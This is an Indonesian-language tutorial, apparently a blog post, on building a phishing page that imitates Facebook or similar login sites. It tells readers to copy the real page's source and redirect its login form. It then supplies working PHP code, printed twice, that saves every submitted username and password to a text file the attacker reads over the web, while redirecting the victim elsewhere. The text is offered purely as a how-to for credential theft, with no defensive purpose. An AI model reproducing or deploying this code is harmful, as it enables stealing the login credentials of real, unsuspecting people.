TUTORIAL SCRIPT PHISING FB (Muhammad Arifin)
Phising, yang berasal dari kata fishing yang diartikan dalam bahasa indonesia artinya memancing. Benar ! teknik metodhe ini tidak asing lagi bagi para hacker yang ingin mengetahui identitas korbannya. Akan tetapi phising ini juga bisa disediakan dalam bentuk website yang sebagai manipulasi ( fake ) . Bagaimana cara membuat page scriptnya ? Langsung saja kalian simak cara membuat page phising berbasis web sebagai berikut :
1. Pertama kunjungi dan lihat source code situs yang ingin dibuat jebakan phising (Ex : facebook, paypal, yahoo, etc ) lalu lihat source codenya (Ctrl + U ) atau klik kanan mouse lalu pilih view source itu pun kalau mozilla & Chrome, Entah apa kalau memakai browser yang lain :) . Lihat Gambar dibawah untuk lebih jelasnya :
2. Lalu copy dan pastekan di notepad, kemudian Save file tersebut dengan nama " index.htm atau index.html " .
3. Selanjutnya kita mengedit bagian source dengan langkah - langkah :
- Cari code " action= " (Ctrl + F untuk mencari ) lalu hapus alamat asli facebook dan ganti dengan " /login.php " ( Untuk direct ) .
- Dan ganti metodhenya dari " post " menjadi "get " .Lihat Gambar dibawah ini !
4.
Sesudah itu, buat page headernya (" login.php ") untuk direct akses
page web. Buka notepad kalian lalu isikan dengan code dibawah ini lalu
save dengan nama " login.php " :
<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Seperti gambar dibawah ini :
<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Seperti gambar dibawah ini :
Keterangan :
- http://www.google.com alamat yang akan muncul ketika sesi login selanjutnya. Bisa diedit misalnya : http://facebook.com, yahoo.com, dll
- passes.txt , untuk melihat password dengan melalui url . Ex : http://domainkalian.com/passes.txt
Semoga bermanfaat!!
